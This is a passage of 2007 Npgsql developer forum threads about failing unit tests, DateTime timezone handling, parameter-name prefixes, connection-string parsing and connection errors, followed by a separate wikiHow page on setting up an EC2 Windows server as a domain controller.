F:\dev\Npgsql2\testsuite\noninteractive\NUnit20\DataAdapterTests.cs(212,0): at NpgsqlTests.DataAdapterTests.UpdateWithDataSet()
TestCase 'NpgsqlTests.DataReaderTests.SingleRowCommandBehaviorSupportFunctioncallPrepare'
failed:
Expected: 1
But was: 6
F:\dev\Npgsql2\testsuite\noninteractive\NUnit20\DataReaderTests.cs(530,0): at NpgsqlTests.DataReaderTests.SingleRowCommandBehaviorSupportFunctioncallPrepare()
162 passed, 8 failed, 0 skipped, took 20.45 seconds.
===================================
For NpgsqlTests.CommandTests.FunctionReturnVoid, there is no test() function in test db, and not in add_functions.sql (or testreturnvoid()?).
For NpgsqlTests.CommandTests.ParametersGetName, I think ":Parameter4" was correct, why expect "Parameter4", is it wrong?
Should we correct those testcases?
RE: I got 8 testcases failed.
[ reply ]
By:
Francisco Figueiredo jr.
on 2007-12-03 13:20
[forum:1002901]
I'm checking that.
One thing I can note now is that the "Dynamic SQL ... message seems to be thrown only on Mono. If you test it on windows, you will see it works. At least last time I tried it worked. :)
The parameter4 problem is that when I add it to Parameters collection, I don't put the : prefix. So, when I try to get its name, I would expect it wouldn't come with : prefix. But Npgsql add it. I didn't check sqlclient behavior to see if you add a parameter without @ prefix if it returns the parameter name with @ anyway. That's why I left this test case failing, to remember me of that. :)
The others for sure we need to fix.
RE: I got 8 testcases failed.
[ reply ]
By:
Tao Wang
on 2007-12-04 04:12
[forum:1002904]
For Dynamic SQL, I ran the test on Windows. So maybe something wrong here.
For ":" prefix, I did a test by following code on SqlClient:
-=================== Begin ==================-
// Sql
SqlCommand sql_command = new SqlCommand();
sql_command.Parameters.Add(new SqlParameter("Parameter1", DbType.DateTime));
sql_command.Parameters.Add(new SqlParameter("@Parameter2", DbType.DateTime));
Console.WriteLine("1:[Parameter1],\t 2:[@Parameter2]");
Console.WriteLine("sql_command.Parameters[0].ParameterName = '{0}'.", sql_command.Parameters[0].ParameterName);
Console.WriteLine("sql_command.Parameters[1].ParameterName = '{0}'.", sql_command.Parameters[1].ParameterName);
//Console.WriteLine("sql_command.Parameters[\"@Parameter1\"].ParameterName = '{0}'.", sql_command.Parameters["@Parameter1"].ParameterName);
//Console.WriteLine("sql_command.Parameters[\"Parameter2\"].ParameterName = '{0}'.", sql_command.Parameters["Parameter2"].ParameterName);
-=================== End ==================-
The output is :
-=================== Begin ==================-
1:[Parameter1], 2:[@Parameter2]
sql_command.Parameters[0].ParameterName = 'Parameter1'.
sql_command.Parameters[1].ParameterName = '@Parameter2'.
-=================== End ==================-
I comment last 2 lines since they are raise IndexOutOfRangeException state there is no such name. I think SqlParameter just treat the name as a normal string, without handling "@" prefix, even though "@param" is actually reference to same parameter of "param".
But during the SqlCommand being excution, the name has been attached the "@" prefix dynamically and send to server. So at the server side, the parameter is always with "@" prefix attached. I didn't test it on Mono, but I read the Mono source code for Mono.Data.Tds.TdsMetaParameter.cs:
It looks like has the same behavior, the "@" was attached dynamically if it's missing. And the TdsMetaParameterCollection didn't handle the "@" prefix.
I did the same test on MySql.Data by following code:
-=================== Begin ==================-
MySqlCommand mysql_command = new MySqlCommand();
mysql_command.Parameters.Add(new MySqlParameter("Parameter1", DbType.DateTime));
mysql_command.Parameters.Add(new MySqlParameter("?Parameter2", DbType.DateTime));
Console.WriteLine("1:[Parameter1],\t 2:[?Parameter2]");
Console.WriteLine("mysql_command.Parameters[0].ParameterName = '{0}'.", mysql_command.Parameters[0].ParameterName);
Console.WriteLine("mysql_command.Parameters[1].ParameterName = '{0}'.", mysql_command.Parameters[1].ParameterName);
Console.WriteLine("mysql_command.Parameters[\"?Parameter1\"].ParameterName = '{0}'.", mysql_command.Parameters["?Parameter1"].ParameterName);
//Console.WriteLine("mysql_command.Parameters[\"Parameter2\"].ParameterName = '{0}'.", mysql_command.Parameters["Parameter2"].ParameterName);
-=================== End ==================-
The output is :
-=================== Begin ==================-
1:[Parameter1], 2:[?Parameter2]
mysql_command.Parameters[0].ParameterName = 'Parameter1'.
mysql_command.Parameters[1].ParameterName = '?Parameter2'.
mysql_command.Parameters["?Parameter1"].ParameterName = 'Parameter1'.
-=================== End ==================-
The last line code I commented raise an ArgumentException with the message "Parameter 'Parameter2' not found in the collection.".
The MySqlParameter didn't handle "?" prefix either, it keep the Parameter name original way. The only difference is the MySqlParameterCollection can handle the name with "?" prefix if search fail, and search name without "?" again.
RE: I got 8 testcases failed.
[ reply ]
By:
Tao Wang
on 2007-12-04 16:04
[forum:1002908]
For Dynamic SQL(TestCase 'NpgsqlTests.DataAdapterTests.UpdateWithDataSet'), I found the reason is there is no primary key in tableB. The case passed if I add a primary key on 'field_serial'. Should we modify the sql?
For TestCase 'NpgsqlTests.CommandTests.FunctionReturnVoid', I replace 'test(:a)' to 'testreturnvoid()'.
For TestCase 'NpgsqlTests.CommandTests.LastInsertedOidSupport', should we add oid to the table at add_table.sql? otherwise there is no oid, and the test seems should always fail.
There are about 2 testcases failed because it using string directly to test against exception message rather than using resource file. I did a test using resource file instead, the 2 testcases passed.
For TestCase 'NpgsqlTests.CommandTests.DateTimeSupportTimezone', and TestCase 'NpgsqlTests.CommandTests.DateTimeSupportTimezone2',
I have thought on the timezone issue, I think we can fix them by short code, the only question is what beheavior we expect?
First, How should we handle datetime string from server, if the field is datetime with timezone, and we want to insert a value to server, there are 3 cases:
1. DateTime with Kind == UTC
I think we should use DateTime.ToString("u"). Since the format is ISO standard, and with "Z" attached to specify the value is UTC value.
2. DateTime with Kind == Local
We have 2 choice here, using current format,
ToString("yyyy-MM-dd HH:mm:ss.ffffff")
which is remove local offset info, and treat the value just as a DateTime without timezone, and leave the problem to server to make the decision. (which actually use the 'timezone' value of server as default timezone for the input).
Another option here is using:
ToString("yyyy-MM-dd HH:mm:ss.ffffffzz")
which the "zz" will be the offset of current system timezone. I think the second way with "zz" should be right, since there actually have timezone info, we should not ignore it. Especially, sometime we use DateTime.Now to get the current time, the value is actually current time for current system local time zone.
3. DateTime with Kind == Unspecified.
For this case, we may want to leave the decision to server, since there is no timezone information. If so, we cannot using format "yyyy-MM-dd HH:mm:ss.ffffffzz", since the "zz" will be the offset of current system local timezone, even it's Kind is not local.
What should we treat the value without timezone in this case? (just submit? submit as local? submit as utc?)
Second, How to parse the string from server?
For example, we get the string with timezone, such as
2002-02-02 09:00:23.345+5
The result of DateTime.ParseExact() is depends on the DateTimeStyles value. Current Npgsql is using None, which will convert above time to the local timezone, which will be, in my system (+11),
2002-02-02 15:00:23.345+11
Actually we have 3 option for the result,
1. Convert the time to UTC time. which should be:
2002-02-02 04:00:23.345Z
This way is reasonable, since it will make all time related code easy to handle. I think this is better.
2. Convert the time to Local time, which is current way. I don't think it's correct, since the current local time may vary.
3. Never convert the time, use the original value, and assign Kind to Unspecified. This way will keep the value identical to the string. However, since .Net DateTime doesn't contain any timezone info except UTC and Local, the timezone is missing, we will have some problem during update the value back to database.(using system local? database server local? utc?)
If we can clear the behavior, the implementation should not be hard to do.
RE: I got 8 testcases failed.
[ reply ]
By:
Tao Wang
on 2007-12-04 16:09
[forum:1002909]
Sorry.
-=======-
First, How should we handle datetime string from server...
-=======-
should be
-=======-
First, How should we handle datetime to string during submit the command to server...
-=======-
RE: I got 8 testcases failed.
[ reply ]
By:
Francisco Figueiredo jr.
on 2007-12-04 18:48
[forum:1002911]
Hi, Tao! Thanks for investigating those errors.
Please, send me your patches for the first corrections.
About datetime, I think we could stick with using UTC when sending and receiving data. It won't be perfect, but at least won't be wrong too. If this isn't enough, I think we could create custom type to add support for timezone as .net native type doesn't have support for timezones other than UTC and local as Tao said.
What do you all think?
RE: I got 8 testcases failed.
[ reply ]
By:
Francisco Figueiredo jr.
on 2007-12-04 18:52
[forum:1002912]
Hi, Tao!
I added a pointer to this discussion on our mail list. Are you subscribed to npgsql-devel@pgfoundry.org? If not, please do it.
This discussion will be kept here, but others may appear in mail list and if you are subscribed you can follow them.
Thanks in advance.
RE: I got 8 testcases failed.
[ reply ]
By:
Tao Wang
on 2007-12-05 03:18
[forum:1002915]
Thanks to point, I subscribed it now.
For testcase 'DateTimeSupportTimezone2()', What is its intention? The case use Command.ExecuteScalar().ToString(); to get the string. I think the result is culture depends, so the testcase will not always pass. Is there any special intention to put the case here?
RE: I got 8 testcases failed.
[ reply ]
By:
Francisco Figueiredo jr.
on 2007-12-05 18:49
[forum:1002923]
Whoops, my fault.
This was a test test-case I used to see if I could get some idea to handle timezone datetime values. You can discard that.
Sorry for that.
RE: I got 8 testcases failed.
[ reply ]
By:
Tao Wang
on 2007-12-05 06:04
[forum:1002917]
I created a patch for fixing testcases.
Patch link:
And could you apply the following patch also? this patch will add a nunit test project for NUnit20 and include it in vs solution file.
Patch link:
RE: I got 8 testcases failed.
[ reply ]
By:
Josh Cooley
on 2007-12-05 04:44
[forum:1002916]
I agree. About the only thing you can do with the DateTime data type and expect it to be correct is to use UTC.
We could support provider specific types to help with the timezone problem. .NET 3.5 has better support for timezones with DateTimeOffset and TimeZoneInfo. The provider could have conversion functions to the 3.5 types when using a 3.5 version.
My only concern is with data binding. If a developer uses timestamp with timezone and expects it to remain local, they will be in for a surprise when they display the DateTime in the UI.
RE: I got 8 testcases failed.
[ reply ]
By:
Francisco Figueiredo jr.
on 2007-12-05 18:53
[forum:1002924]
+1.
I think the provider specific type is one good solution. With it we can work with those different support in framework versions as Josh said.
Also, as Tao said later, if we put it in our manual, users will know what is expected. If there is need for other expectations, we can work on them. Maybe we could add an entry on connection string to tell Npgsql how to deal with timezones.
RE: I got 8 testcases failed.
[ reply ]
By:
Tao Wang
on 2007-12-05 07:11
[forum:1002918]
I think put a notice in manual might be a good solution if we use DateTime and stick to UTC. At least, the logic will never break if we use UTC.
There might be another way, we add a property to let developer specify which time they want(local/utc) before the command be excuted, and we convert it to specified time during the convertion as they want.
I agree with using DateTimeOffset, even it's not so great since it cannot handle daylight saving problem and cannot use it to do calculation on time if daylight saving timezone is involved, however, it is much better than current DateTime.
I checked my MSDN library, it's said DateTimeOffset struct is supported in: 3.5, 3.0 SP1, 2.0 SP1. 2.0 SP1 is a little bit tricky, I got it only during the installation of VS2008. Is there any automatic update will update .net 2.0 framework to 2.0 sp1? Mono treat the DateTimeOffset as NET_2_0 feature, but haven't been implemented yet. So what target .net version should we put this feature in? .Net 2.0? .Net 3.5?
RE: I got 8 testcases failed.
[ reply ]
By:
Tao Wang
on 2007-12-05 08:11
[forum:1002919]
I create a patch using DateTime.Kind to stick to UTC. It looks ok, at least passed the test case. There is only 2 behaviors I am not clear.
During convertion from DateTime to postgresql timestamp with timezone string, if the DateTime value's Kind == Unspecified, what should we do?
1. Using "yyyy-MM-dd HH:mm:ss.ffffff" format and leave the problem to server?
2. Treat Unspecified DateTime as local, and convert it to UTC, and submit?
3. Treat Unspecified DateTime as UTC, using "u" to submit to server?
I think the first should be better, however, the insert result will depends on current server runtime variable 'timezone', so at client side, developer will never know the real result. If we do so, we might need put a notice in manual.
During parsing string from server, if there is no timezone information attached, and it's timestamp with time zone value, Is it possible to happen? if it's, what should we do?
1. Treat the time as UTC.
2. Treat the time as system local timezone(NOTE, not server current local timezone!).
3. Return a DateTime with Unspecified Kind.
I also tried DateTimeOffset, (NET35), I found a problem, If we use DateTimeOffset for mapping timestamp with timezone in .Net 3.5, we will get inconsistance API, that is, the project run correctly with Npgsql .Net 2.0 version will might not be able to run with Npgsql .Net 3.5.
the problem is in .Net 2.0 Npgsql, timestamp with timezone field will cause a DateTime object returned, however, in .Net 3.5, the field will return a DateTimeOffset object, and DateTimeOffset is not inherit from DateTime, so program will got invalid casting exception, if they try to cast to DateTime. How we handle this?
RE: I got 8 testcases failed.
[ reply ]
By:
Josh Cooley
on 2007-12-05 14:27
[forum:1002921]
I agree that sending a date time to the server should convert to UTC unless the Kind is Unspecified. In that case we should leave it up to the server (choice 1).
I think we should try to get timezone information back from the server. If that's not possible, then I think we have to say that the DateTime.Kind is again Unspecified (choice 3).
You are right in that we can't change the type from 2.0 to 3.5. But we can provide a provider specific type that has conversion methods to go from "NpgsqlDateTime" to System.DateTime and System.DateTimeOffset.
RE: I got 8 testcases failed.
[ reply ]
By:
Francisco Figueiredo jr.
on 2007-12-05 19:05
[forum:1002925]
Hmmmm, I think we should stick to UTC even if kind unspecified, don't we? So user will know that we always will treat datetime timezone as UTC unless otherwise specified (like when setting explicitly the kind to local).
What do you think?
When receiving data from server, I think that when the field is created with timezone, the values from server will always carry timezone information. If not, I think we should always treat them as in UTC. For example, with datetime fields created without timezone we would treat them as UTC, wouldn't we?
Please, correct me if I'm wrong. I may be missing something.
RE: I got 8 testcases failed.
[ reply ]
By:
David Bachmann
on 2007-12-18 14:36
[forum:1002957]
>2.0 SP1 is a little bit tricky, I got it only during the installation of VS2008.
>Is there any automatic update will update .net 2.0 framework to 2.0 sp1?
Yes, Microsoft provides an installer for updating .NET 2.0 to .NET 2.0 SP1:
Cannot connect to database (Npgsql)
[ reply ]
By:
Chris Miles
on 2007-12-11 15:12
[forum:1002939]
I have just installed Npgsql (stable), and I am having problems connecting to my database.
This is the code I am using:
NpgsqlConnection conn = new NpgsqlConnection("Server=192.168.0.50;Port=5432;User Id=cakeinaboxadmin;Password=cakeinaboxadmin;Database=cakeinabox;");
conn.Open();
Ip and port is valid - I can connect with pgadmin to the database without any problems.
An exception is thrown on the conn.Open() line:
"Unable to read data from the transport connection: An existing connection was forcibly closed by the remote host."
Full exception trace as follows:
Thanks
Chris
RE: Cannot connect to database (Npgsql)
[ reply ]
By:
Josh Cooley
on 2007-12-12 05:25
[forum:1002940]
I'm not sure what the circumstances are that would cause this error. You definitely got the initial socket connection established. It appears the PostgreSQL disconnected your client after receiving the startup packet.
Check your PostgreSQL configuration to see if you've disallowed certain types of connections. (maybe you only allow SSL)
RE: Cannot connect to database (Npgsql)
[ reply ]
By:
Chris Miles
on 2007-12-12 15:33
[forum:1002941]
Thanks.
The database is set up to allow all connections.
Chris
RE: Cannot connect to database (Npgsql)
[ reply ]
By:
Jon Hanna
on 2007-12-12 18:01
[forum:1002943]
Try disallowing SSL, and then trying again.
"An existing connection was forcibly closed by the remote host." is an exception that gets raised at the socket level. There's a large number of possible causes, many of which have nothing to do with either PostgreSQL or Npgsql (which is unfortunate in a way as it makes them all the harder to debug), but a common one is issues with SSL certificates.
If disallowing SSL fixes the problem, then we'll know that's where the problem is, and can look at fixing that so you can allow SSL again.
If disallowing SSL doesn't fix the problem, then we'll still know that's not where the problem is, so at least that'll be something :)
Badly formed XML comments in npgsql.xml
[ reply ]
By:
Andrus Moor
on 2007-11-11 20:08
[forum:1002815]
npgsql.xml contains a lot of messages like
<!-- Badly formed XML comment ignored for member "P:Npgsql.NpgsqlConnection.ConnectionString" -->
<!-- Badly formed XML comment ignored for member "M:Npgsql.NpgsqlConnection.GetSchema" -->
RE: Badly formed XML comments in npgsql.xml
[ reply ]
By:
Josh Cooley
on 2007-11-12 05:38
[forum:1002816]
I've found the same thing using visual studio. It doesn't like the newlines between comment sections. Nothing is wrong with the xml, just the comment parser. I can't remember if I committed a fix for that or not. My npgsql work is at home, and I'm away for the week.
RE: Badly formed XML comments in npgsql.xml
[ reply ]
By:
Jon Hanna
on 2007-12-10 12:54
[forum:1002931]
I've submitted two patches that deal with this (1010213 for the .NET1.x build and 1010215 which has .NET2.0 versions of the bunch of .NET1.x patches I submitted in one patch).
Mostly it was just newlines which break up the /// block and parsers don't like. There was a handful of bad tags too.
Login as Administrator
[ reply ]
By:
Vital Logic
on 2007-12-08 07:02
[forum:1002929]
I want to create database from my application, using npgsql. However the connection string explicitly needs a database to be passed as paramenter. How can I solve this?
Similar is the case with creating users from the application.
RE: Login as Administrator
[ reply ]
By:
Francisco Figueiredo jr.
on 2007-12-08 14:29
[forum:1002930]
Hi, Vital!
You should use the template1 database. There you can create other databases and users.
I hope it helps!
Npgsql sunc notifications.How?
[ reply ]
By:
Dmitry Nizinkin
on 2007-10-29 08:52
[forum:1002787]
Hi, I have Win xp sp2,Postgresql 8.2.0,npgsql 1.0 data provider.
I need recieve notify from Postgresql server when row add in table on server.I write trigger on insert.In body this trigger write: notify MyApp.
In my application do:
npgsqlconnection+=new EventHandler(func);
It's work, but async. My app recieve message when i send next command on server.How my application can recieve message immediately.Pls help me.
[ reply ]
By:
Sean Zeng
on 2007-12-03 18:05
[forum:1002902]
Hi,
I met a weird problem when save a string with back slash then search for it.
1. I wrote two PG stored procedures, one to insert a string, one to retrieve it.
a. FUNCTION proc_add_value(i_value text) as:
INSERT INTO TEST_DATA (NAME) VALUES(I_VALUE);
b. FUNCTION proc_find_value(i_value text) as:
FOR O_NAME IN SELECT NAME FROM TEST_DATA WHERE UPPER(NAME) LIKE UPPER(I_VALUE) || '%'
LOOP
RETURN NEXT O_NAME;
END LOOP;
2. In C#, call the stored procedures through npgsql:
a. call proc_add_value with string parameter of @"HKLM\Software\test"
I can see the record is added correctly in pgadmin.
b. call proc_find_value with string parameter of @"HKLM\Software"
No record is returned.
c. call proc_find_value with string parameter of @"HKLM\\Software" (noted that there are two back slashes in the string)
The record of "HKLM\Software\test" is returned.
-------------
In summary, I inserted @"HKLM\Software\test" but need to pass in @"HKLM\\Software" (double back slash) to find it. It seems strange to me.
Do I miss anything?
Thanks!
Sean
RE: search for string with back slash
[ reply ]
By:
Tao Wang
on 2007-12-04 05:10
[forum:1002905]
9.7. Pattern Matching
9.7.1. LIKE
...
Note that the backslash already has a special meaning in string literals, so to write a pattern constant that contains a backslash you must write two backslashes in an SQL statement (assuming escape string syntax is used)..
...
So, modify the function to:
FUNCTION proc_find_value(i_value text) as:
FOR O_NAME IN SELECT NAME FROM TEST_DATA WHERE UPPER(NAME) LIKE UPPER(I_VALUE) || '%' ESCAPE ''
LOOP
RETURN NEXT O_NAME;
END LOOP;
should works.
RE: search for string with back slash
[ reply ]
By:
Sean Zeng
on 2007-12-04 21:30
[forum:1002913]
Great, it works fine. Now the C# codes are consistent and look much better :-)
A few questions about Npgsql2
[ reply ]
By:
Tao Wang
on 2007-11-28 16:43
[forum:1002874]
1. I think "CLASSNAME" in each class is not necessary, we can use "this.GetType().Name" instead. Am I missing anything here?
2. The Mono.Security reference is used for SSL connection. But .Net Framework 2.0 already implement SslStream, is that possible to eliminate Mono.Security dependence by using System.Net.Security.SslStream? And same thing for MD5, maybe using System.Security.Cryptography.MD5 is more natural for .Net 2.0. There are some classes or functions seems could be simplified by taking advantage of .Net 2.0 framework.
3. The recent updated test case for Connection:
[Test]
[ExpectedException(typeof(NpgsqlException))]
public void ConnectionStringWithSemicolonSignValue()
{
NpgsqlConnection conn = new NpgsqlConnection("Server=127.0.0.1;Port=44444;User Id=npgsql_tets;Password='j;'");
conn.Open();
}
I cannot understand the case. Should we throw a Exception here?
If yes, how to write connection string which contains a password which contains a semicolon?
4. Missing 3 methods, 1 property in NpgsqlFactory.
public virtual bool CanCreateDataSourceEnumerator { get; }
public virtual DbConnectionStringBuilder CreateConnectionStringBuilder();
public virtual DbDataSourceEnumerator CreateDataSourceEnumerator();
public virtual CodeAccessPermission CreatePermission(PermissionState state);
They are new in .Net 2.0.
5. Maybe we should implement a class NpgsqlConnectionStringBuilder which inherit from DbConnectionStringBuilder, to replace NpgsqlConnectionString. They are really similar and some functions in NpgsqlConnectionString has done in DbConnectionStringBuilder.
6. May be we should have a look on LINQ, there are some code implement LINQ to SQL for postgresql by using npgsql. :
It's MIT license, is it possible that Npgsql merge the code from the project to make Npgsql support LINQ directly? or a sub-project to do it?
7. Npgsql seems not well support in design mode of Visual Studio. At least not as well as MySQL.Data did. Could that part be improved?
Thanks.
Tao Wang.
RE: A few questions about Npgsql2
[ reply ]
By:
Francisco Figueiredo jr.
on 2007-11-28 18:25
[forum:1002878]
1. I think it is ok to use getType().Name.
2. We have a request about that. I think it is ok too. I was thinking about using Mono.Security because it is maintained by Sebastien Pouliot from Mono project. But if we see we can use existing framework implementation, I think we can use it. As on Mono, it will still use Sebastien's implementation.
3. The intention of this test is to throw the exception based on connection refused because the port isn't the default. If this connection string passes, the exception will be thrown by Opne() method. You can use the semicolon the same way it is shown here with the value enclosed by single or double quotes.
4. Patches are welcome!
5. Patches are welcome!
6. Yeah, this would be great! I was pointed to this site when I was talking about Npgsql on Mono project. It would be very nice if we could release Npgsql with this add on project.
7. Yes. We have plans to integrate this. One of the reasons to change license was also to easy the process of add this support because of license restrictions on vs.net design support support code.
RE: A few questions about Npgsql2
[ reply ]
By:
Tao Wang
on 2007-11-28 16:49
[forum:1002875]
One more question about ParsingConnectionString(), may we don't using Regular Expression here? I try to write code below, and looks ok.(the only exception is handling the "value" contains a semicolon, which will not be correct parsed, but this can fixed by add a few lines code.). Can Npgsql use similar code to do that? Or, by inherit from DbConnectionStringBuilder, we can use the function existing to parse the connection string directly without writing any code for this.
======================================================================================
if (!string.IsNullOrEmpty(CS))
{
string[] items = CS.Split(";".ToCharArray());
foreach (string item in items)
{
string[] keyvalue = item.Split("=".ToCharArray());
if (keyvalue.Length == 2)
{
// Key
string key = keyvalue[0].Trim().ToUpperInvariant();
// Substitute the real key name if this is an alias key (ODBC stuff for example)...
string alias_key = (string)ConnectionStringKeys.Aliases[key];
if (!string.IsNullOrEmpty(alias_key))
{
key = alias_key;
}
// Value
string value = keyvalue[1].Trim();
if (value.StartsWith("\"") && value.EndsWith("\""))
{
value = value.Substring(1, value.Length - 2).Trim();
}
else if (value.StartsWith("'") && value.EndsWith("'"))
{
value = value.Substring(1, value.Length - 2).Trim();
}
// Check quote pair (open should always come with close)
if ((value.StartsWith("\"") && !value.EndsWith("\""))
|| (!value.StartsWith("\"") && value.EndsWith("\""))
|| (value.StartsWith("'") && !value.EndsWith("'"))
|| (!value.StartsWith("'") && value.EndsWith("'"))
)
{
throw new ArgumentException(resman.GetString("Exception_WrongKeyVal"), key);
}
newValues.Add(key, value);
}
else
{
if (keyvalue.Length > 1)
{
if (keyvalue[0].Trim().Length > 0)
{
throw new ArgumentException(resman.GetString("Exception_WrongKeyVal"), keyvalue[0].Trim());
}
else
{
throw new ArgumentException(resman.GetString("Exception_WrongKeyVal"), "<BLANK>");
}
}
else
{
throw new ArgumentException(resman.GetString("Exception_WrongKeyVal"), "<INVALID>");
}
}
}
}
======================================================================================
RE: A few questions about Npgsql2
[ reply ]
By:
Francisco Figueiredo jr.
on 2007-11-28 18:36
[forum:1002879]
+1 to inherit from dbconnectionstringbuilder.
This way we need to maintain less code and reuse existing one.
RE: A few questions about Npgsql2
[ reply ]
By:
Tao Wang
on 2007-11-29 12:33
[forum:1002887]
For NpgsqlConnectionStringBuilder, I submited a patch. This patch add NpgsqlConnectionStringBuilder class to replace NpgsqlConnectionString class, and also add a cache support for connection string parse. Passed Npgsql test suite.
Patch link:
RE: A few questions about Npgsql2
[ reply ]
By:
Francisco Figueiredo jr.
on 2007-11-29 18:13
[forum:1002889]
Thanks Tao.
I'm working on it.
As soon as I apply your patches I will let you know.
Thanks for your feedback and support.
RE: A few questions about Npgsql2
[ reply ]
By:
Francisco Figueiredo jr.
on 2007-12-02 18:11
[forum:1002898]
Hi, Tao!
Patch applied! Thanks very much! And keep the good work!
RE: A few questions about Npgsql2
[ reply ]
By:
Tao Wang
on 2007-12-03 04:12
[forum:1002899]
Hi, Francisco,
Thanks, but you forgot apply the patch Npgsql_connection_string_builder.patch
, which will replace NpgsqlConnectionString with NpgsqlConnectionStringBuilder in several files, include :
NpgsqlCommand.cs
NpgsqlConnection.cs
NpgsqlConnector.cs
NpgsqlConnectorPool.cs
NpgsqlFactory.cs
RE: A few questions about Npgsql2
[ reply ]
By:
Francisco Figueiredo jr.
on 2007-12-03 13:14
[forum:1002900]
Whoops, sorry for that!
Committed now! Please, check it out and let me know if you still have any problems.
Tao, could you please update vs.net project and send me the patch? I will update Monodevelop project.
Thanks in advance.
RE: A few questions about Npgsql2
[ reply ]
By:
Tao Wang
on 2007-12-04 02:11
[forum:1002903]
I created a patch for both Npgsql.csproj and Npgsql2008.csproj.
Patch Link:
RE: A few questions about Npgsql2
[ reply ]
By:
Francisco Figueiredo jr.
on 2007-12-04 18:36
[forum:1002910]
Patch applied!
Thanks Tao!
RE: A few questions about Npgsql2
[ reply ]
By:
Josh Cooley
on 2007-11-28 19:31
[forum:1002882]
"The Mono.Security reference is used for SSL connection. But .Net Framework 2.0 already implement SslStream, is that possible to eliminate Mono.Security dependence by using System.Net.Security.SslStream?"
We have talked about that in the past. That is a breaking change for the NpgsqlConnection API. As long as a breaking change is acceptable, then it does simplify things.
Newer Messages
Older Messages | http://pgfoundry.org/forum/forum.php?max_rows=50&style=nested&offset=2533&forum_id=519 | CC-MAIN-2017-17 | en | refinedweb |
#include <configfile.h>
List of all members.
This class is used to load settings from a configuration text file. Ths file is dividing into sections, with section having a set of key/value fields. Example file format is as follows:
# This is a comment
section_name
(
key1 0
key2 "foo"
key3 ["foo" "bar"]
)
Standard constructor.
Standard destructor.
Load config from file.
Check for unused fields and print warnings.
Read a string value.
Read an integer value.
Read a floating point (double) value.
Read a length (includes unit conversion, if any).
Read an angle (includes unit conversion).
In the configuration file, angles are specified in degrees; this method will convert them to radians.
Read a color (includes text to RGB conversion).
In the configuration file colors may be specified with sybolic names; e.g., "blue" and "red". This function will convert them to an RGB value using the X11 rgb.txt file.
Read a filename.
Always returns an absolute path. If the filename is entered as a relative path, we prepend the config file's path to it.
Get the number of values in a tuple.
Read a string from a tuple field.
Read an integer from a tuple field.
Read a float (double) from a tuple field.
Read a length from a tuple (includes units conversion).
Read an angle form a tuple (includes units conversion).
Read a device id.
Get the number of sections.
Get a section type name.
Lookup a section number by section type name.
Get a section's parent section.
Dump the token list (for debugging).
Dump the section list for debugging.
Dump the field list for debugging.
Name of the file we loaded. | http://playerstage.sourceforge.net/doc/Player-1.6.5/player-html/classConfigFile.php | CC-MAIN-2017-17 | en | refinedweb |
If you are a Haskell convert from Lisp, JavaScript or any other dynamic programming language, you might miss eval function of those languages.
eval lets us load code dynamically and execute it on the fly. It is commonly used to provide user-defined plugins and is a very handy tool for software extension.
Dynamic evaluation is not limited to dynamic languages. Even Java supports dynamic class loading through class loaders. It seems Haskell does not support dynamic evaluation as it is a strictly defined language. But GHC allows us to compile and execute Haskell code dynamically through GHC API.
hint library provides a Haskell interpreter built on top of GHC API. It allows to load and execute Haskell expressions and even coerce them into values.
hint provides a bunch of monadic actions based on
InterpreterT monad transformer.
runInterpreter is used to execute the action.
runInterpreter :: (MonadIO m, MonadMask m) => InterpreterT m a -> m (Either InterpreterError a)
Type check
We can check the type of a Haskell expression using
typeOf.
λ> import Language.Haskell.Interpreter λ> runInterpreter $ typeOf "\"foo\"" Right "[GHC.Types.Char]" λ> runInterpreter $ typeOf "3.14" Right "GHC.Real.Fractional t => t"
Import modules
hint does not import prelude implicitly. We need import modules explicitly using
setImport. For qualified imports, use
setImportQ instead.
λ> runInterpreter $ do { setImports ["Prelude"]; typeOf "head [True, False]" } Right "Bool" λ> runInterpreter $ do { setImportsQ [("Prelude", Nothing), ("Data.Map", Just "M") ]; typeOf "M.empty" } Right "M.Map k a"
Evaluate expressions
eval function lets us evaluate Haskell expressions dynamically.
λ> runInterpreter $ do { setImports ["Prelude"]; eval "head [True, False]" } Right "True" λ> runInterpreter $ do { setImports ["Prelude"]; eval "1 + 2 * 3" } Right "7"
The result type of evaluation is
String. To convert the result into the type we want, use
interpret with
as. Here
as provides a witness for its monomorphic type.
λ> runInterpreter $ do { setImports ["Prelude"]; interpret "head [True, False]" (as :: Bool) } Right True λ> runInterpreter $ do { setImports ["Prelude"]; interpret "1 + 2 * 3" (as :: Int) } Right 7
Load modules
It is also possible to load modules dynamically.
Here’s a small module
Foo stored in
Foo.hs file.
module Foo where f = head g = tail
We can load
Foo using
loadModules function.
setTopLevelModules ensures that all bindings of the module are in scope.
import Control.Monad import Language.Haskell.Interpreter ex :: Interpreter () ex = do loadModules ["Foo.hs"] setTopLevelModules ["Foo"] setImportsQ [("Prelude", Nothing)] let expr1 = "f [1, 2, 3]" a <- eval expr1 liftIO $ print a let expr2 = "g [1, 2, 3]" a <- eval expr2 liftIO $ print a main :: IO () main = do r <- runInterpreter ex case r of Left err -> print err Right () -> return ()
Executing this program prints
"1" "[2,3]"
because
f is
head and
g is
tail. | http://kseo.github.io/posts/2017-01-19-fun-with-hint.html | CC-MAIN-2017-17 | en | refinedweb |
Edit Article
wikiHow to Turn Your Ec2 Based Windows Server Into a Dc
Setting up a single virtual Windows machine on EC2 may be a trivial process, but setting it up as a real DC and connecting multiple virtual machines to it is another story. This how to provides the basis for setting up a proper DC on EC2.
Steps
- 1Launch your instances
- 2Get Administrator password for each instance
- 3Set a new Administrator password
- 4Disable
Ec2SetComputerNamein
%programfiles%\Amazon\Ec2ConfigService\Settings\config.xmlon all servers
- 5Rename the computers
- 6Set the DNS server to point to the DC (
netsh int ip set dns "local area connection" static xx.xxx.xxx.xxx primary) where
xxx.xxx.xxx.xxxis the internal IP address of the DC.
- 7Choose a DNS namespace (
ad.compute-1.internal)
- 8Add the Domain Controller role: (a) Domain controller for a new domain; (b) Domain in a new forest; (c) Use the DNS name from step 7; (d) Specify a Domain NetBIOS name (AD); (e) Specify/Accept the default Database folder and Log folder; note you should use the C: drive for both to ensure they are included in an AMI when bundled; (f) Specify/Accept the default for the SYSVOL folder location (again, you'll want to use the c: drive); (g) install and configure the DNS Server on this computer, and set this computer to use this DNS server as its preferred DNS server; (h) Permissions compatible only with Windows 200 or Windows Server 2003; and (i) Specify a directory services restore mode administrator password.
- 9Point the member servers at the DC for DNS (
netsh int ip set dns "local area connection" static xxx.xxx.xxx.xxx primary) where
xxx.xxx.xxx.xxxis the internal IP address of the DC.
- 10Join the Domain.
Community Q&A
Search
Ask a Question
